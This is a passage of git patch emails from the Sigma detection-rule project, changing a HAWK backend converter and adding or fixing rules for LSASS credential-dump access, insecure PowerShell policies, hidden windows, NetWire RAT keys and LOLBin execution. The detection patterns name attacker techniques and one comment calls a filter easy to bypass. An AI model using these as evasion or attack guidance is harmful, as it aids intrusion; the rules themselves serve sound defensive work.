raise Exception("Unknown type for false positives: ", type(sigmaparser.parsedyaml['falsepositives'])) if 'references' in sigmaparser.parsedyaml: - cmt += "References: \n%s" % "\n".join(sigmaparser.parsedyaml['references']) + ref = "%s\n" % "\n".join(sigmaparser.parsedyaml['references']) + else: + ref = '' record = { "rules" : analytic, # analytic_txt.replace('"','""'), "filter_name" : sigmaparser.parsedyaml['title'], @@ -412,8 +414,9 @@ class HAWKBackend(SingleTextQueryBackend): "enabled" : True, "public" : True, "comments" : cmt, + "references" : ref, "group_name" : ".", - "score_id" : sigmaparser.parsedyaml['id'] + "hawk_id" : sigmaparser.parsedyaml['id'] } if 'tags' in sigmaparser.parsedyaml: record["tags"] = sigmaparser.parsedyaml['tags'] From d5498eecbf48e065ad24a461822cdb248d0b0d5f Mon Sep 17 00:00:00 2001 From: Tim Shelton Date: Tue, 19 Oct 2021 02:35:45 +0000 Subject: [PATCH 1272/1367] updating hawk backend, still pending aggregation support --- tools/config/hawk.yml | 116 +++++++++++++++++++++++++++++++++++ tools/sigma/backends/hawk.py | 73 +++++++++++++++++++--- 2 files changed, 180 insertions(+), 9 deletions(-) diff --git a/tools/config/hawk.yml b/tools/config/hawk.yml index 5caf6ede..2b1f8f6f 100644 --- a/tools/config/hawk.yml +++ b/tools/config/hawk.yml @@ -2,6 +2,121 @@ title: HAWK order: 20 backends: - hawk +logsources: + apache: + product: apache + conditions: + product_name: '*apache*' + windows: + product: windows + index: windows + conditions: + vendor_name: 'Microsoft' + windows-application: + product: windows + service: application + conditions: + product_name: 'Application' + windows-security: + product: windows + service: security + conditions: + product_name: 'Security' + windows-system: + product: windows + service: system + conditions: + product_name: 'System' + windows-sysmon: + product: windows + service: sysmon + conditions: + product_name: 'Sysmon' + windows-powershell: + product: windows + service: powershell + conditions: + product_name: 'PowerShell' + windows-classicpowershell: + product: windows + service: powershell-classic + conditions: + product_name: 'Windows PowerShell' + windows-taskscheduler: + product: windows + service: taskscheduler + conditions: + product_name: 'TaskScheduler' + windows-wmi: + product: windows + service: wmi + conditions: + product_name: 'WMI-Activity' + windows-dns-server: + product: windows + service: dns-server + category: dns + conditions: + product_name: 'DNS Server' + windows-dns-server-audit: + product: windows + service: dns-server-audit + conditions: + product_name: 'DNS-Server' + windows-driver-framework: + product: windows + service: driver-framework + conditions: + product_name: 'DriverFrameworks-UserMode' + windows-ntlm: + product: windows + service: ntlm + conditions: + product_name: 'NTLM' + windows-dhcp: + product: windows + service: dhcp + conditions: + product_name: 'DHCP-Server' + windows-defender: + product: windows + service: windefend + conditions: + product_name: 'Windows Defender' + windows-applocker: + product: windows + service: applocker + conditions: + product_name: + - 'AppLocker' + windows-msexchange-management: + product: windows + service: msexchange-management + conditions: + product_name: 'MSExchange Management' + windows-printservice-admin: + product: windows + service: printservice-admin + conditions: + product_name: 'PrintService' + windows-printservice-operational: + product: windows + service: printservice-operational + conditions: + product_name: 'PrintService' + windows-smbclient-security: + product: windows + service: smbclient-security + conditions: + product_name: 'SmbClient' + qflow: + product: qflow + netflow: + product: netflow + ipfix: + product: ipfix + flow: + category: flow fieldmappings: dst: - ip_dst_host @@ -80,6 +195,7 @@ fieldmappings: TargetObject: object ObjectClass: object_type ObjectValueName: object_name + ObjectName: object_name DeviceClassName: object_name Details: object_target CallTrace: calltrace diff --git a/tools/sigma/backends/hawk.py b/tools/sigma/backends/hawk.py index 17dbc6a1..4a4dcc26 100644 --- a/tools/sigma/backends/hawk.py +++ b/tools/sigma/backends/hawk.py @@ -1,4 +1,19 @@ -# Output backends for sigmac - HAWK.io +# Output backends for sigmac +# Copyright 2021 HAWK.io + +# This program is free software: you can redistribute it and/or modify +# it under the terms of the GNU Lesser General Public License as published by +# the Free Software Foundation, either version 3 of the License, or +# (at your option) any later version. + +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU Lesser General Public License for more details. + +# You should have received a copy of the GNU Lesser General Public License +# along with this program. If not, see . + import re @@ -18,6 +33,7 @@ class HAWKBackend(SingleTextQueryBackend): config_required = False default_config = ["sysmon", "hawk"] reEscape = re.compile('(")') + logname = None reClear = None andToken = " , " orToken = " , " @@ -63,6 +79,7 @@ class HAWKBackend(SingleTextQueryBackend): #print(node) return self.generateSubexpressionNode(node) elif type(node) == tuple: + #print("TUPLE: ", node) return self.generateMapItemNode(node, notNode) elif type(node) in (str, int): nodeRet = {"key": "", "description": "", "class": "column", "return": "str", "args": { "comparison": { "value": "regex" }, "str": { "value": "5" } } } @@ -156,7 +173,9 @@ class HAWKBackend(SingleTextQueryBackend): if self.mapListsSpecialHandling == False and type(value) in (str, int, list) or self.mapListsSpecialHandling == True and type(value) in (str, int): nodeRet['key'] = self.cleanKey(key).lower() nodeRet['description'] = key - if type(value) == str and "*" in value: + if key.lower() in ("logname","source"): + self.logname = value + elif type(value) == str and "*" in value: # value = value.replace("*", ".*") value = value.replace("*", "") if notNode: @@ -314,15 +333,53 @@ class HAWKBackend(SingleTextQueryBackend): timeframe_object['months'] = int(duration) return timeframe_object + + def generateBefore(self, parsed): + if self.logname: + return self.logname + return self.logname + def generate(self, sigmaparser): """Method is called for each sigma rule and receives the parsed rule (SigmaParser)""" + columns = list() + mapped =None + #print(sigmaparser.parsedyaml) + self.logsource = sigmaparser.parsedyaml.get("logsource") if sigmaparser.parsedyaml.get("logsource") else sigmaparser.parsedyaml.get("logsources", {}) + fields = "" + try: + #print(sigmaparser.parsedyaml["fields"]) + for field in sigmaparser.parsedyaml["fields"]: + mapped = sigmaparser.config.get_fieldmapping(field).resolve_fieldname(field, sigmaparser) + if type(mapped) == str: + columns.append(mapped) + elif type(mapped) == list: + columns.extend(mapped) + else: + raise TypeError("Field mapping must return string or list") + + fields = ",".join(str(x) for x in columns) + fields = " | table " + fields + + except KeyError: # no 'fields' attribute + mapped = None + pass + + #print("Mapped: ", mapped) #print(sigmaparser.parsedyaml) #print(sigmaparser.condparsed) + #print("Columns: ", columns) + #print("Fields: ", fields) + #print("Logsource: " , self.logsource) + for parsed in sigmaparser.condparsed: query = self.generateQuery(parsed, sigmaparser) before = self.generateBefore(parsed) after = self.generateAfter(parsed) + #print("Before: ", before) + + #print("Query: ", query) + result = "" if before is not None: result = before @@ -336,7 +393,6 @@ class HAWKBackend(SingleTextQueryBackend): def generateQuery(self, parsed, sigmaparser): self.sigmaparser = sigmaparser result = self.generateNode(parsed.parsedSearch) - self.parsedlogsource = sigmaparser.get_logsource().index """ if any("flow" in i for i in self.parsedlogsource): aql_database = "flows" @@ -345,12 +401,12 @@ class HAWKBackend(SingleTextQueryBackend): """ prefix = "" ret = '[ { "id" : "and", "key": "And", "children" : [' - ret2 =" ] } ]" - """ + ret2 = ' ] } ]' try: mappedFields = [] for field in sigmaparser.parsedyaml["fields"]: mapped = sigmaparser.config.get_fieldmapping(field).resolve_fieldname(field, sigmaparser) + #print(mapped) mappedFields.append(mapped) if " " in mapped and not "(" in mapped: prefix += ", \"" + mapped + "\"" @@ -360,7 +416,6 @@ class HAWKBackend(SingleTextQueryBackend): except KeyError: # no 'fields' attribute mapped = None pass - """ #if parsed.parsedAgg: #and timeframe == None: # (prefix, suffixAgg) = self.generateAggregation(parsed.parsedAgg) @@ -374,9 +429,9 @@ class HAWKBackend(SingleTextQueryBackend): # result = prefix + result #print(result) - result = prefix + json.dumps(result) - - #print(sigmaparser.parsedyaml) + #print("Prefix: ", prefix) + # result = prefix + json.dumps(result) + result = json.dumps(result) analytic_txt = ret + result + ret2 # json.dumps(ret) try: From deecced9627a518d1801af1400557fd3849c65e6 Mon Sep 17 00:00:00 2001 From: phantinuss Date: Mon, 18 Oct 2021 12:11:32 +0200 Subject: [PATCH 1273/1367] fix: FP tuning when CommandLine logging is not activated for 4688 events --- .../windows/process_creation/win_susp_regsvr32_no_dll.yml | 8 ++++++-- 1 file changed, 6 insertions(+), 2 deletions(-) diff --git a/rules/windows/process_creation/win_susp_regsvr32_no_dll.yml b/rules/windows/process_creation/win_susp_regsvr32_no_dll.yml index 790363fa..621d962a 100644 --- a/rules/windows/process_creation/win_susp_regsvr32_no_dll.yml +++ b/rules/windows/process_creation/win_susp_regsvr32_no_dll.yml @@ -4,7 +4,7 @@ status: experimental description: Detects a regsvr.exe execution that doesn't contain a DLL in the command line author: Florian Roth date: 2019/07/17 -modified: 2021/10/07 +modified: 2021/10/19 references: - https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/ tags: @@ -24,7 +24,11 @@ detection: - '.ax' - '.bav' - '.ppl' - condition: selection and not filter + filter_null1_for_4688: + CommandLine: null + filter_null2_for_4688: + CommandLine: '' + condition: selection and not filter and not filter_null1_for_4688 and not filter_null2_for_4688 fields: - CommandLine - ParentCommandLine From a63cc967fe7f93f3c571ce344ece38fb43d63fb7 Mon Sep 17 00:00:00 2001 From: Andreas Hunkeler Date: Tue, 19 Oct 2021 13:51:25 +0200 Subject: [PATCH 1274/1367] Fix MITRE tag in COM hijacking rule --- .../sysmon_registry_persistence_search_order.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/windows/registry_event/sysmon_registry_persistence_search_order.yml b/rules/windows/registry_event/sysmon_registry_persistence_search_order.yml index d97b58ca..ae9db5ae 100755 --- a/rules/windows/registry_event/sysmon_registry_persistence_search_order.yml +++ b/rules/windows/registry_event/sysmon_registry_persistence_search_order.yml @@ -4,13 +4,13 @@ status: experimental description: Detects potential COM object hijacking leveraging the COM Search Order references: - https://www.cyberbit.com/blog/endpoint-security/com-hijacking-windows-overlooked-security-vulnerability/ + - https://attack.mitre.org/techniques/T1546/015/ author: Maxime Thiebaut (@0xThiebaut), oscd.community, Cédric Hien date: 2020/04/14 modified: 2021/09/16 tags: - attack.persistence - - attack.t1038 # an old one - - attack.t1574.001 + - attack.t1546.015 logsource: category: registry_event product: windows From 75193321f81652ef2eb4186ddfa0a05bf6b3f9bd Mon Sep 17 00:00:00 2001 From: phantinuss Date: Tue, 19 Oct 2021 18:30:02 +0200 Subject: [PATCH 1275/1367] feat: mstsc history cleared --- .../registry_event_mstsc_history_cleared.yml | 27 +++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 rules/windows/registry_event/registry_event_mstsc_history_cleared.yml diff --git a/rules/windows/registry_event/registry_event_mstsc_history_cleared.yml b/rules/windows/registry_event/registry_event_mstsc_history_cleared.yml new file mode 100644 index 00000000..4d969f09 --- /dev/null +++ b/rules/windows/registry_event/registry_event_mstsc_history_cleared.yml @@ -0,0 +1,27 @@ +title: Terminal Server Client Connection History Cleared +id: 07bdd2f5-9c58-4f38-aec8-e101bb79ef8d +description: Detects the deletion of registry keys containing the MSTSC connection history +references: + - https://docs.microsoft.com/en-us/troubleshoot/windows-server/remote/remove-entries-from-remote-desktop-connection-computer + - http://woshub.com/how-to-clear-rdp-connections-history/ +tags: + - attack.defense_evasion + - attack.t1070 + - attack.t1112 +author: Christian Burkard +status: experimental +date: 2021/10/19 +logsource: + category: registry_event + product: windows +detection: + selection1: + EventType: DeleteValue + TargetObject|contains: '\Microsoft\Terminal Server Client\Default\MRU' + selection2: + EventType: DeleteKey + TargetObject|contains: '\Microsoft\Terminal Server Client\Servers\' + condition: 1 of them +falsepositives: + - unknown +level: high From ff439099bc985cb3936878a7aac9f26e6d149a94 Mon Sep 17 00:00:00 2001 From: securepeacock <92804416+securepeacock@users.noreply.github.com> Date: Tue, 19 Oct 2021 18:20:23 -0400 Subject: [PATCH 1276/1367] Create registry_event_mal_netwire.yml --- .../malware/registry_event_mal_netwire.yml | 29 +++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 rules/windows/malware/registry_event_mal_netwire.yml diff --git a/rules/windows/malware/registry_event_mal_netwire.yml b/rules/windows/malware/registry_event_mal_netwire.yml new file mode 100644 index 00000000..a8a1b29f --- /dev/null +++ b/rules/windows/malware/registry_event_mal_netwire.yml @@ -0,0 +1,29 @@ +title: NetWire RAT Registry Key +id: 1d218616-71b0-4c40-855b-9dbe75510f7f +description: Attempts to detect registry events for common NetWire key HKCU\Software\NetWire +Note: You likely will have to change the sysmon configuration file. + Per SwiftOnSecurity "Because Sysmon runs as a service, it has no filtering ability for, + or concept of, HKCU or HKEY_CURRENT_USER. Use "contains" or "end with" to get around this limitation" + Therefore I set netwire in my configuration. +status: experimental +references: + - https://www.fortinet.com/blog/threat-research/new-netwire-rat-variant-spread-by-phishing + - https://resources.infosecinstitute.com/topic/netwire-malware-what-it-is-how-it-works-and-how-to-prevent-it-malware-spotlight/ + - https://unit42.paloaltonetworks.com/guloader-installing-netwire-rat/ + - https://blogs.blackberry.com/en/2021/09/threat-thursday-netwire-rat-is-coming-down-the-line + - https://app.any.run/tasks/41ecdbde-4997-4301-a350-0270448b4c8f/ +tags: + - attack.defense_evasion + - attack.t1112 +date: 2021/10/07 +author: Christopher Peacock +level: high +logsource: + product: windows + category: registry_event +detection: + selection1: + TargetObject|contains: '\software\NetWire' + condition: selection1 +falsepositives: + - No known false positives From 8f4a0cf4d6df593520d36272890ef3f413081ef5 Mon Sep 17 00:00:00 2001 From: securepeacock <92804416+securepeacock@users.noreply.github.com> Date: Tue, 19 Oct 2021 18:23:42 -0400 Subject: [PATCH 1277/1367] Update registry_event_mal_netwire.yml --- rules/windows/malware/registry_event_mal_netwire.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/malware/registry_event_mal_netwire.yml b/rules/windows/malware/registry_event_mal_netwire.yml index a8a1b29f..f844af14 100644 --- a/rules/windows/malware/registry_event_mal_netwire.yml +++ b/rules/windows/malware/registry_event_mal_netwire.yml @@ -14,7 +14,7 @@ references: - https://app.any.run/tasks/41ecdbde-4997-4301-a350-0270448b4c8f/ tags: - attack.defense_evasion - - attack.t1112 + - attack.t1112 #The configuration information is usually stored under HKCU:\Software\Netwire - RedCanary date: 2021/10/07 author: Christopher Peacock level: high From f9efc127de4b4382b11d0ada4eb277b3965243b0 Mon Sep 17 00:00:00 2001 From: frack113 Date: Wed, 20 Oct 2021 12:58:43 +0200 Subject: [PATCH 1278/1367] add powershell_set_policies_to_unsecure_level --- ...ershell_set_policies_to_unsecure_level.yml | 27 +++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 rules/windows/powershell/powershell_script/powershell_set_policies_to_unsecure_level.yml diff --git a/rules/windows/powershell/powershell_script/powershell_set_policies_to_unsecure_level.yml b/rules/windows/powershell/powershell_script/powershell_set_policies_to_unsecure_level.yml new file mode 100644 index 00000000..3c53354e --- /dev/null +++ b/rules/windows/powershell/powershell_script/powershell_set_policies_to_unsecure_level.yml @@ -0,0 +1,27 @@ +title: Change PowerShell Policies to a Unsecure Level +id: 61d0475c-173f-4844-86f7-f3eebae1c66b +description: Detects use of Set-ExecutionPolicy to set a unsecure policies +references: + - https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.1 + - https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-7.1 + - https://adsecurity.org/?p=2604 +tags: + - attack.execution + - attack.t1059.001 +author: frack113 +date: 2021/10/20 +logsource: + product: windows + category: ps_script +detection: + cmdlet: + ScriptBlockText|contains: 'Set-ExecutionPolicy' + option: + ScriptBlockText|contains: + - 'Unrestricted' + - 'bypass' + - 'RemoteSigned' + condition: cmdlet and option +falsepositives: + - Administrator script +level: high \ No newline at end of file From a9bc26f37cb7097b7391ab755a01a07ddc0b62d6 Mon Sep 17 00:00:00 2001 From: frack113 Date: Wed, 20 Oct 2021 13:57:24 +0200 Subject: [PATCH 1279/1367] add powershell_suspicious_windowstyle --- .../powershell_suspicious_windowstyle.yml | 24 +++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 rules/windows/powershell/powershell_script/powershell_suspicious_windowstyle.yml diff --git a/rules/windows/powershell/powershell_script/powershell_suspicious_windowstyle.yml b/rules/windows/powershell/powershell_script/powershell_suspicious_windowstyle.yml new file mode 100644 index 00000000..da2d506f --- /dev/null +++ b/rules/windows/powershell/powershell_script/powershell_suspicious_windowstyle.yml @@ -0,0 +1,24 @@ +title: Suspicious PowerShell WindowStyle Option +id: 313fbb0a-a341-4682-848d-6d6f8c4fab7c +status: experimental +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md +description: Adversaries may use hidden windows to conceal malicious activity from the plain sight of users. In some cases, windows that would typically be displayed when an application carries out an operation can be hidden +tags: + - attack.defense_evasion + - attack.t1564.003 +author: frack113 +date: 2021/10/20 +logsource: + product: windows + category: ps_script +detection: + selection: + ScriptBlockText|contains|all: + - 'powershell' + - 'WindowStyle' + - 'Hidden' + condition: selection +falsepositives: + - Unknown +level: medium \ No newline at end of file From 47502e67011bfca75b176f1112206be0d5873f44 Mon Sep 17 00:00:00 2001 From: Stefan Grimminck Date: Wed, 20 Oct 2021 14:29:57 +0200 Subject: [PATCH 1280/1367] add MITRE technique mapping --- rules/cloud/aws/aws_efs_fileshare_mount_modified_or_deleted.yml | 1 + rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml | 1 + 2 files changed, 2 insertions(+) diff --git a/rules/cloud/aws/aws_efs_fileshare_mount_modified_or_deleted.yml b/rules/cloud/aws/aws_efs_fileshare_mount_modified_or_deleted.yml index b7bcf6e1..d6d22c65 100644 --- a/rules/cloud/aws/aws_efs_fileshare_mount_modified_or_deleted.yml +++ b/rules/cloud/aws/aws_efs_fileshare_mount_modified_or_deleted.yml @@ -18,3 +18,4 @@ falsepositives: level: medium tags: - attack.impact + - attack.t1485 diff --git a/rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml b/rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml index 342d5744..1ffc1495 100644 --- a/rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml +++ b/rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml @@ -18,6 +18,7 @@ detection: level: low tags: - attack.impact + - attack.t1485 falsepositives: - EKS Cluster being created or deleted may be performed by a system administrator. - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. From 7500346ce76395a3de86c564fc852cff7fcfa6bb Mon Sep 17 00:00:00 2001 From: al3t <92431865+al3t@users.noreply.github.com> Date: Wed, 20 Oct 2021 17:06:55 +0300 Subject: [PATCH 1281/1367] Update winlogbeat-modules-enabled.yml updating field mapping --- tools/config/winlogbeat-modules-enabled.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tools/config/winlogbeat-modules-enabled.yml b/tools/config/winlogbeat-modules-enabled.yml index 99c98191..a917b4c6 100644 --- a/tools/config/winlogbeat-modules-enabled.yml +++ b/tools/config/winlogbeat-modules-enabled.yml @@ -110,7 +110,7 @@ fieldmappings: #Keywords: from "Value" is lost with winlogbeat exist in nxlog Provider_Name: winlog.provider_name CallingProcessName: winlog.event_data.CallingProcessName - ComputerName: winlog.ComputerName + ComputerName: winlog.computer_name EventType: winlog.event_data.EventType FailureCode: winlog.event_data.FailureCode FileName: file.path From 216b2d65d9ae61d906c7adbecf4293be0ad39f8d Mon Sep 17 00:00:00 2001 From: frack113 Date: Wed, 20 Oct 2021 19:45:38 +0200 Subject: [PATCH 1282/1367] fix SourceImage --- .../windows/process_access/sysmon_cred_dump_lsass_access.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/windows/process_access/sysmon_cred_dump_lsass_access.yml b/rules/windows/process_access/sysmon_cred_dump_lsass_access.yml index dfaf68fc..e4c5cea6 100755 --- a/rules/windows/process_access/sysmon_cred_dump_lsass_access.yml +++ b/rules/windows/process_access/sysmon_cred_dump_lsass_access.yml @@ -5,7 +5,7 @@ description: Detects process access LSASS memory which is typical for credential author: Florian Roth, Roberto Rodriguez, Dimitrios Slamaris, Mark Russinovich, Thomas Patzke, Teymur Kheirkhabarov, Sherif Eldeeb, James Dickenson, Aleksey Potapov, oscd.community (update) date: 2017/02/16 -modified: 2021/05/16 +modified: 2021/10/20 references: - https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow - https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html @@ -38,7 +38,7 @@ detection: - '0x1f2fff' - '0x1f3fff' filter: - ProcessName|endswith: # easy to bypass. need to implement supportive rule to detect bypass attempts + SourceImage|endswith: # easy to bypass. need to implement supportive rule to detect bypass attempts - '\wmiprvse.exe' - '\taskmgr.exe' - '\procexp64.exe' From a47645a084842193a800be72c4f874e690510a17 Mon Sep 17 00:00:00 2001 From: V1D1AN Date: Thu, 21 Oct 2021 08:34:41 +0200 Subject: [PATCH 1283/1367] Modify event.provider to event.module --- tools/config/ecs-auditbeat-modules-enabled.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tools/config/ecs-auditbeat-modules-enabled.yml b/tools/config/ecs-auditbeat-modules-enabled.yml index 9251d711..f078c96e 100644 --- a/tools/config/ecs-auditbeat-modules-enabled.yml +++ b/tools/config/ecs-auditbeat-modules-enabled.yml @@ -18,7 +18,7 @@ logsources: product: linux service: auditd conditions: - event.provider: auditd + event.module: auditd defaultindex: auditbeat-* From 6c7d5124f5d0fcf2fd212114a6ee94dbc4492ac3 Mon Sep 17 00:00:00 2001 From: frack113 Date: Thu, 21 Oct 2021 09:28:33 +0200 Subject: [PATCH 1284/1367] fix detection --- .../sysmon_in_memory_assembly_execution.yml | 9 ++++----- 1 file changed, 4 insertions(+), 5 deletions(-) diff --git a/rules/windows/process_access/sysmon_in_memory_assembly_execution.yml b/rules/windows/process_access/sysmon_in_memory_assembly_execution.yml index 50b71bbe..02285b7d 100755 --- a/rules/windows/process_access/sysmon_in_memory_assembly_execution.yml +++ b/rules/windows/process_access/sysmon_in_memory_assembly_execution.yml @@ -7,7 +7,7 @@ description: Detects the access to processes by other suspicious processes which routines are already present in memory, not requiring any calls to external libraries. The latter should also be considered suspicious. status: experimental date: 2019/10/27 -modified: 2021/05/16 +modified: 2021/10/21 author: Perez Diego (@darkquassar), oscd.community, Jonhnathan Ribeiro references: - https://azure.microsoft.com/en-ca/blog/detecting-in-memory-attacks-with-sysmon-and-azure-security-center/ @@ -23,8 +23,8 @@ logsource: detection: selection1: CallTrace|contains|all: - - 'C:\\Windows\\SYSTEM32\\ntdll.dll+' - - '|C:\\Windows\\System32\\KERNELBASE.dll+' + - 'C:\Windows\SYSTEM32\ntdll.dll+' + - '|C:\Windows\System32\KERNELBASE.dll+' - '|UNKNOWN(' - ')' selection2: @@ -34,7 +34,6 @@ detection: CallTrace|endswith: ")" selection3: CallTrace|contains: "UNKNOWN" - granted_access: GrantedAccess: - "0x1F0FFF" - "0x1F1FFF" @@ -47,7 +46,7 @@ detection: filter: SourceImage|endswith: - '\Windows\System32\sdiagnhost.exe' - condition: (selection1 or selection2) or (selection3 and granted_access) and not filter + condition: selection1 or selection2 or selection3 and not filter fields: - ComputerName - User From 4394aa685d60f0b0dd2af3c73e411dbe96c26065 Mon Sep 17 00:00:00 2001 From: frack113 Date: Thu, 21 Oct 2021 09:47:06 +0200 Subject: [PATCH 1285/1367] fix cast --- rules/windows/process_access/sysmon_invoke_phantom.yml | 9 ++++----- 1 file changed, 4 insertions(+), 5 deletions(-) diff --git a/rules/windows/process_access/sysmon_invoke_phantom.yml b/rules/windows/process_access/sysmon_invoke_phantom.yml index f779354d..47481481 100755 --- a/rules/windows/process_access/sysmon_invoke_phantom.yml +++ b/rules/windows/process_access/sysmon_invoke_phantom.yml @@ -4,7 +4,7 @@ status: experimental description: Detects suspect access to svchost process memory such as that used by Invoke-Phantom to kill the winRM windows event logging service. author: Tim Burrell date: 2020/01/02 -modified: 2020/08/24 +modified: 2021/10/21 references: - https://github.com/hlldz/Invoke-Phant0m - https://twitter.com/timbmsft/status/900724491076214784 @@ -17,10 +17,9 @@ logsource: product: windows detection: selection: - TargetImage|endswith: '\windows\system32\svchost.exe' - GrantedAccess: '0x1f3fff' - CallTrace|contains: - - 'unknown' + TargetImage|endswith: '\WINDOWS\System32\svchost.exe' + GrantedAccess: '0x1F3FFF' + CallTrace|contains: 'UNKNOWN' condition: selection falsepositives: - unknown From 1775db7fe80feae8895dd01b5c93232bb12bc52d Mon Sep 17 00:00:00 2001 From: frack113 Date: Thu, 21 Oct 2021 09:58:32 +0200 Subject: [PATCH 1286/1367] fix cast --- .../process_access/sysmon_in_memory_assembly_execution.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/windows/process_access/sysmon_in_memory_assembly_execution.yml b/rules/windows/process_access/sysmon_in_memory_assembly_execution.yml index 02285b7d..8455bfee 100755 --- a/rules/windows/process_access/sysmon_in_memory_assembly_execution.yml +++ b/rules/windows/process_access/sysmon_in_memory_assembly_execution.yml @@ -23,8 +23,8 @@ logsource: detection: selection1: CallTrace|contains|all: - - 'C:\Windows\SYSTEM32\ntdll.dll+' - - '|C:\Windows\System32\KERNELBASE.dll+' + - 'C:\WINDOWS\SYSTEM32\ntdll.dll+' + - '|C:\WINDOWS\System32\KERNELBASE.dll+' - '|UNKNOWN(' - ')' selection2: From 9c25c89dbb045b5d431a9c723cae7e1306a47b40 Mon Sep 17 00:00:00 2001 From: Maxime THIEBAUT <46688461+0xThiebaut@users.noreply.github.com> Date: Thu, 21 Oct 2021 10:38:49 +0200 Subject: [PATCH 1287/1367] Add LOLBin rule win_susp_workfolders --- .../process_creation/win_susp_diskshadow.yml | 2 +- .../process_creation/win_susp_workfolders.yml | 25 +++++++++++++++++++ 2 files changed, 26 insertions(+), 1 deletion(-) create mode 100644 rules/windows/process_creation/win_susp_workfolders.yml diff --git a/rules/windows/process_creation/win_susp_diskshadow.yml b/rules/windows/process_creation/win_susp_diskshadow.yml index 6c57237e..e7f857ac 100644 --- a/rules/windows/process_creation/win_susp_diskshadow.yml +++ b/rules/windows/process_creation/win_susp_diskshadow.yml @@ -12,7 +12,7 @@ date: 2020/10/07 logsource: category: process_creation product: windows - definition: 'Requirements: Sysmon ProcessCreation logging must be activated and Windows audit msut Include command line in process creation events' + definition: 'Requirements: Sysmon ProcessCreation logging must be activated and Windows audit must Include command line in process creation events' detection: selection: Image|endswith: '\diskshadow.exe' diff --git a/rules/windows/process_creation/win_susp_workfolders.yml b/rules/windows/process_creation/win_susp_workfolders.yml new file mode 100644 index 00000000..99bf31a2 --- /dev/null +++ b/rules/windows/process_creation/win_susp_workfolders.yml @@ -0,0 +1,25 @@ +title: Execution via WorkFolders.exe +id: 0bbc6369-43e3-453d-9944-cae58821c173 +status: experimental +description: Detects using WorkFolders.exe to execute an arbitrary control.exe +references: + - https://twitter.com/elliotkillick/status/1449812843772227588 +tags: + - attack.defense_evasion + - attack.t1218 +author: Maxime Thiebaut (@0xThiebaut) +date: 2021/10/21 +logsource: + category: process_creation + product: windows + definition: 'Requirements: Sysmon ProcessCreation logging must be activated' +detection: + selection: + Image|endswith: '\control.exe' + ParentImage|endswith: '\WorkFolders.exe' + filter: + Image: 'C:\Windows\System32\control.exe' + condition: selection and not filter +falsepositives: + - Legitimate usage of the uncommon Windows Work Folders feature. +level: high From e772dbf0a9d5f7370abe44daf3b10f9036b3a356 Mon Sep 17 00:00:00 2001 From: davedhoff <3jonii3@gmail.com> Date: Fri, 22 Oct 2021 13:56:47 -0500 Subject: [PATCH 1288/1367] Import Iterable from collections.abc --- tools/sigma/config/collection.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tools/sigma/config/collection.py b/tools/sigma/config/collection.py index cf870557..1abf3f4c 100644 --- a/tools/sigma/config/collection.py +++ b/tools/sigma/config/collection.py @@ -14,7 +14,7 @@ # You should have received a copy of the GNU Lesser General Public License # along with this program. If not, see . -from collections import Iterable +from collections.abc import Iterable from pathlib import Path import sys import re From a5fae664b94eb478e92e3d0df3fca12241ed54ca Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Fri, 22 Oct 2021 19:48:10 -0500 Subject: [PATCH 1289/1367] Create process_creation_stordiag_execution.yml --- .../process_creation_stordiag_execution.yml | 29 +++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 rules/windows/process_creation_stordiag_execution.yml diff --git a/rules/windows/process_creation_stordiag_execution.yml b/rules/windows/process_creation_stordiag_execution.yml new file mode 100644 index 00000000..84a6fc4a --- /dev/null +++ b/rules/windows/process_creation_stordiag_execution.yml @@ -0,0 +1,29 @@ +title: Execution via stordiag.exe +id: 961e0abb-1b1e-4c84-a453-aafe56ad0d34 +status: experimental +description: Detects the use of stordiag.exe to execute schtasks.exe systeminfo.exe and fltmc.exe +references: + - https://strontic.github.io/xcyclopedia/library/stordiag.exe-1F08FC87C373673944F6A7E8B18CD845.html + - https://twitter.com/eral4m/status/1451112385041911809 +tags: + - attack.defense_evasion + - attack.t1218 +author: Austin Songer (@austinsonger) +date: 2021/10/21 +logsource: + category: process_creation + product: windows +detection: + selection1: + Image|endswith: '\schtasks.exe' + ParentImage|endswith: '\stordiag.exe' + selection2: + Image|endswith: '\systeminfo.exe' + ParentImage|endswith: '\stordiag.exe' + selection3: + Image|endswith: '\fltmc.exe' + ParentImage|endswith: '\stordiag.exe' + condition: selection1 or selection2 or selection3 +falsepositives: + - Legitimate usage of stordiag.exe. +level: high From 448c86587fd89faefeaf5d95270a3e4a37ab2ef3 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sat, 23 Oct 2021 13:29:16 -0500 Subject: [PATCH 1290/1367] Update process_creation_stordiag_execution.yml --- .../process_creation_stordiag_execution.yml | 19 ++++++++++--------- 1 file changed, 10 insertions(+), 9 